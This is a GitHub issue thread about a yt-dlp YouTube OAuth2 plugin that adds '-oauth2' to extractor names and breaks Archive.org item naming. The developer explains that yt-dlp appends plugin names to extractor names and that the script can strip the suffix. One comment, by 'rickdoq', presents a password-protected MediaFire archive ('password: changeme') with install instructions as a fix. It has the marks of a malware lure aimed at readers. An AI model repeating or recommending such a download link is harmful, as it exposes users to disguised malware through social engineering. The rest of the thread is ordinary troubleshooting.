### ISSUE TITLE
rename siteID / extractorID to remove "-oauth2"

### ISSUE THREAD

**Issue by vxbinaca** [coletdjnz/yt-dlp-youtube-oauth2#35]
I help maintain a script that automates ingestion of video using yt-dlp for upload to Archive.org.

Your plugin seems like a good bandaid solution to Youtube requiring signin. However your plugin breaks the dataset we've been building because item names on Archive.org are created using `siteID-videoID` and the `siteID` your plugin creates is `youtube-oauth2-videoID` instead of `youtube-videoID` and this breaks scripts Archie.org staff use to automate uploads using this script to the appropriate place.

Can you please have this plugin use normal `siteID` of `youtube`?

**Comment by coletdjnz** [comment]
Hmm, that's strange, there shouldn't be anything in the plugin itself changing that. Possibly a core yt-dlp plugin system bug 🤔

**Comment by coletdjnz** [comment]
Where are you getting the "site id" from?

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by coletdjnz** [comment]
I had a quick look, it seem like you are using the extractor display name https://github.com/bibanon/tubeup/blob/4ca730ca3f10ca5fe7bc10c36fe0a71ece67aad5/tubeup/utils.py#L13.

yt-dlp in general appends the plugin name to the extractor name, for any plugin injecting into an existing extractor, not just this one. Note this behaviour has existed for a couple years.

if you went to continue using the extractor display name, your code should strip out anything following a +.

I've brought this up with the yt-dlp team to review (imo it's a relic of the original yt-dlp plugin system that is redundant now).
